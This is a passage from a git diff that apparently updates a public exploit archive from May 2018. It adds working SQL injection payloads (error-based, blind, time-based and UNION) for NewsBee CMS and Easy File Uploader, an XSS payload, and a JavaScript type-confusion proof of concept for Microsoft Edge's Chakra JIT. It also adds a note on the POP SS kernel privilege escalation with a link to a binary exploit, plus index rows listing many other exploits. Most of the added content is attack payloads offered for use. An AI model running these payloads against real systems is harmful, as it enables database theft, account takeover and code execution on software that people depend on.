8962=8962 AND (SELECT 1892 FROM(SELECT +COUNT(*),CONCAT(0x7162787871,(SELECT +(ELT(1892=1892,1))),0x71766a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- eLUC + +# Type: AND/OR time-based blind +# Demo: http://Target/NewsBee/admin/download.php?id=578&t=gallery +# Payload: + +id=578&t=gallery` WHERE 5549=5549 AND SLEEP(5)-- RUaY \ No newline at end of file diff --git a/exploits/php/webapps/44703.txt b/exploits/php/webapps/44703.txt new file mode 100644 index 000000000..1bf65ac99 --- /dev/null +++ b/exploits/php/webapps/44703.txt @@ -0,0 +1,48 @@ +# Exploit Title: Easy File Uploader 1.7 - SQL Injection / Cross-Site +Scripting +# Dork: N/A +# Date: 22.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor Homepage: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287 +# Version: 1.4 / fourth update +# Category: Webapps +# Tested on: Kali linux +# Description : Non-authorized users can perform the attack in the editing +area. +==================================================== + +# PoC : SQLi : + +Parameter : id + + Type : boolean-based blind + Demo : +http://test.com/EasyFileUploader/settings-users-edit.php?id=1 + Payload : id=1' RLIKE (SELECT (CASE WHEN (7769=7769) THEN 27 ELSE 0x28 +END))-- wKWi + + Type : error-based + Payload : id=1' AND (SELECT 6379 FROM(SELECT +COUNT(*),CONCAT(0x717a627671,(SELECT +(ELT(6379=6379,1))),0x7178707071,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ATeG + + Type : AND/OR time-based blind + Demo : +http://test.com/EasyFileUploader/settings-users-edit.php?id=1 + Payload : id=1' AND SLEEP(5)-- gTLZ + + Type : UNION query + Demo : +http://test.com/EasyFileUploader/settings-users-edit.php?id=1 + Payload : id=-3300' UNION ALL SELECT +NULL,NULL,CONCAT(0x717a627671,0x79556745594846426c69514d71737744775a6450464a5963786658766171476f447a79684675714a,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL# + + +==================================================== + +# PoC : XSS : + + Payload : +http://test.com/EasyFileUploader/settings-users-edit.php?id=%27%20%3C/script%3E%3Cscript%3Ealert%28%27akkus+keyney%27%29%3C/script%3E%E2%80%98 +; \ No newline at end of file diff --git a/exploits/windows/dos/44694.js b/exploits/windows/dos/44694.js new file mode 100644 index 000000000..2676ff561 --- /dev/null +++ b/exploits/windows/dos/44694.js @@ -0,0 +1,33 @@ +/* +BOOL JavascriptNativeFloatArray::SetItem(uint32 index, double dValue) +{ + if (*(uint64*)&dValue == *(uint64*)&JavascriptNativeFloatArray::MissingItem) + { + JavascriptArray *varArr = JavascriptNativeFloatArray::ToVarArray(this); + varArr->DirectSetItemAt(index, JavascriptNumber::ToVarNoCheck(dValue, GetScriptContext())); + return TRUE; + } + + this->DirectSetItemAt(index, dValue); + return TRUE; +} + +As you can see above, if the double value given as the parameter equals to JavascriptNativeFloatArray::MissingItem, it converts the float array to a var array. Since the input value is not checked in the JITed code, it can lead to type confusion. +*/ + +function opt(arr, value) { + arr[1] = value; + arr[0] = 2.3023e-320; +} + +function main() { + for (let i = 0; i < 0x10000; i++) + opt([1.1], 2.2); + + let arr = [1.1]; + opt(arr, -5.3049894784e-314); // MAGIC VALUE! + + print(arr); +} + +main(); \ No newline at end of file diff --git a/exploits/windows/local/44697.txt b/exploits/windows/local/44697.txt new file mode 100644 index 000000000..07e64ee61 --- /dev/null +++ b/exploits/windows/local/44697.txt @@ -0,0 +1,7 @@ +Demo exploitation of the POP SS vulnerability (CVE-2018-8897), leading to unsigned code execution with kernel privilages. + +- KVA Shadowing should be disabled and the relevant security update should be uninstalled. +- This may not work with certain hypervisors (like VMWare), which discard the pending #DB after INT3. + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44697.zip \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 1f7035a83..70e094804 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -5974,6 +5974,9 @@ id,file,description,date,author,type,platform,port 44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios, 44641,exploits/linux/dos/44641.c,"Linux < 4.16.9 / < 4.14.41 - 4-byte Infoleak via Uninitialized Struct Field in compat adjtimex Syscall",2018-05-17,"Google Security Research",dos,linux, 44653,exploits/windows/dos/44653.js,"Microsoft Edge Chakra JIT - Bound Check Elimination Bug",2018-05-18,"Google Security Research",dos,windows, +44693,exploits/linux/dos/44693.py,"Siemens SIMATIC S7-1500 CPU - Remote Denial of Service",2018-05-22,t4rkd3vilz,dos,linux, +44694,exploits/windows/dos/44694.js,"Microsoft Edge Chakra JIT - Magic Value Type Confusion",2018-05-22,"Google Security Research",dos,windows, +44695,exploits/hardware/dos/44695.c,"AMD / ARM / Intel - Speculative Execution Variant 4 Speculative Store Bypass",2018-05-22,"Google Security Research",dos,hardware, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -9724,6 +9727,10 @@ id,file,description,date,author,type,platform,port 44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows, 44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux, 44680,exploits/windows_x86/local/44680.py,"R 3.4.4 - Local Buffer Overflow (DEP Bypass)",2018-05-21,"Hashim Jawad",local,windows_x86, +44688,exploits/linux/local/44688.txt,"Dell EMC RecoverPoint boxmgmt CLI < 5.1.2 - Arbitrary File Read",2018-05-22,"Paul Taylor",local,linux, +44690,exploits/android/local/44690.txt,"MakeMyTrip 7.2.4 - Information Disclosure",2018-05-22,"Divya Jain",local,android, +44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux, +44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39330,7 +39337,8 @@ id,file,description,date,author,type,platform,port 44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php, 44625,exploits/php/webapps/44625.txt,"VirtueMart 3.1.14 - Persistent Cross-Site Scripting",2018-05-16,"Mattia Furlani",webapps,php, 44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows, -44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting",2018-05-16,L0RD,webapps,php, +44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Cross-Site Scripting",2018-05-16,L0RD,webapps,php, +44685,exploits/php/webapps/44685.txt,"Zechat 1.5 - SQL Injection / Cross-Site Request Forgery",2018-05-22,L0RD,webapps,php, 44628,exploits/linux/webapps/44628.txt,"Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery",2018-05-16,L0RD,webapps,linux, 44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp, 44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80 @@ -39339,7 +39347,7 @@ id,file,description,date,author,type,platform,port 44637,exploits/hardware/webapps/44637.py,"Intelbras NCLOUD 300 1.0 - Authentication bypass",2018-05-17,"Pedro Aguiar",webapps,hardware, 44639,exploits/php/webapps/44639.txt,"SuperCom Online Shopping Ecommerce Cart 1 - Persistent Cross-Site scripting / Cross site request forgery / Authentication bypass",2018-05-17,L0RD,webapps,php, 44640,exploits/linux/webapps/44640.txt,"Powerlogic/Schneider Electric IONXXXX Series - Cross-Site Request Forgery",2018-05-17,t4rkd3vilz,webapps,linux, -44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php, +44645,exploits/php/webapps/44645.txt,"Healwire Online Pharmacy 3.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php, 44646,exploits/php/webapps/44646.txt,"Monstra CMS before 3.0.4 - Cross-Site Scripting",2018-05-18,"Berk Dusunur",webapps,php, 44647,exploits/linux/webapps/44647.txt,"SAP NetWeaver Web Dynpro 6.4 < 7.5 - Information Disclosure",2018-05-18,"Richard Alviarez",webapps,linux, 44651,exploits/php/webapps/44651.txt,"Infinity Market Classified Ads Script 1.6.2 - Cross-Site Request Forgery",2018-05-18,L0RD,webapps,php, @@ -39348,18 +39356,30 @@ id,file,description,date,author,type,platform,port 44657,exploits/hardware/webapps/44657.txt,"D-Link DSL-3782 - Authentication Bypass",2018-05-20,"Giulio Comi",webapps,hardware, 44661,exploits/php/webapps/44661.txt,"Superfood 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php, 44660,exploits/php/webapps/44660.txt,"Joomla! Component EkRishta 2.10 - Cross-Site Scripting / SQL Injection",2018-05-20,"Sina Kheirkhah",webapps,php, -44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php, -44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php, +44662,exploits/php/webapps/44662.txt,"Private Message PHP Script 2.0 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php, +44663,exploits/php/webapps/44663.txt,"Flippy DamnFacts - Viral Fun Facts Sharing Script 1.1.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-21,L0RD,webapps,php, 44664,exploits/php/webapps/44664.txt,"Zenar Content Management System - Cross-Site Scripting",2018-05-21,"Berk Dusunur",webapps,php, 44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java, -44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Persistent Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java, +44666,exploits/java/webapps/44666.txt,"ManageEngine Recovery Manager Plus 5.3 - Cross-Site Scripting",2018-05-21,"Ahmet Gurel",webapps,java, 44667,exploits/linux/webapps/44667.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,linux, 44671,exploits/hardware/webapps/44671.html,"Teradek VidiU Pro 3.0.3 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware, 44672,exploits/hardware/webapps/44672.txt,"Teradek VidiU Pro 3.0.3 - Server-Side Request Forgery",2018-05-21,LiquidWorm,webapps,hardware, 44675,exploits/hardware/webapps/44675.html,"Teradek Cube 7.3.6 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware, 44676,exploits/hardware/webapps/44676.html,"Teradek Slice 7.3.15 - Cross-Site Request Forgery",2018-05-21,LiquidWorm,webapps,hardware, 44678,exploits/windows/webapps/44678.txt,"Schneider Electric PLCs - Cross-Site Request Forgery",2018-05-21,t4rkd3vilz,webapps,windows, -44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Admin Panel Authentication Bypass",2018-05-21,L0RD,webapps,php, +44679,exploits/php/webapps/44679.txt,"Auto Dealership & Vehicle Showroom WebSys 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php, 44681,exploits/linux/webapps/44681.txt,"Merge PACS 7.0 - Cross-Site Request Forgery",2018-05-21,"Safak Aslan",webapps,linux, -44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Persistent Cross-Site Scripting / Cross-Site Request Forgery / Authentication Bypass",2018-05-21,L0RD,webapps,php, -44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Persistent Cross-Site Scripting",2018-05-21,L0RD,webapps,php, +44682,exploits/php/webapps/44682.txt,"Model Agency Media House & Model Gallery 1.0 - Multiple Vulnerabilities",2018-05-21,L0RD,webapps,php, +44683,exploits/php/webapps/44683.txt,"Wchat PHP AJAX Chat Script 1.5 - Cross-Site Scripting",2018-05-21,L0RD,webapps,php, +44684,exploits/hardware/webapps/44684.txt,"Nordex N149/4.0-4.5 - SQL Injection",2018-05-22,t4rkd3vilz,webapps,hardware, +44686,exploits/php/webapps/44686.txt,"WebSocket Live Chat - Cross-Site Scripting",2018-05-22,"Alireza Norkazemi",webapps,php, +44687,exploits/linux/webapps/44687.txt,"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting",2018-05-22,t4rkd3vilz,webapps,linux, +44689,exploits/php/webapps/44689.txt,"PaulPrinting CMS Printing 1.0 - SQL Injection",2018-05-22,"Mehmet Onder",webapps,php, +44692,exploits/php/webapps/44692.txt,"iSocial 1.2.0 - Cross-Site Scripting / Cross-Site Request Forgery",2018-05-22,L0RD,webapps,php, +44691,exploits/java/webapps/44691.txt,"ERPnext 11 - Cross-Site Scripting",2018-05-22,"Veerababu Penugonda",webapps,java, +44698,exploits/linux/webapps/44698.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,linux, +44699,exploits/php/webapps/44699.txt,"Auto Car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting",2018-05-22,L0RD,webapps,php, +44700,exploits/php/webapps/44700.txt,"NewsBee CMS 1.4 - 'home-text-edit.php' SQL Injection",2018-05-22,AkkuS,webapps,php, +44701,exploits/php/webapps/44701.txt,"Feedy RSS News Ticker 2.0 - 'cat' SQL Injection",2018-05-22,AkkuS,webapps,php, +44702,exploits/php/webapps/44702.txt,"NewsBee CMS 1.4 - 'download.php' SQL Injection",2018-05-22,AkkuS,webapps,php, +44703,exploits/php/webapps/44703.txt,"Easy File Uploader 1.7 - SQL Injection / Cross-Site Scripting",2018-05-22,AkkuS,webapps,php,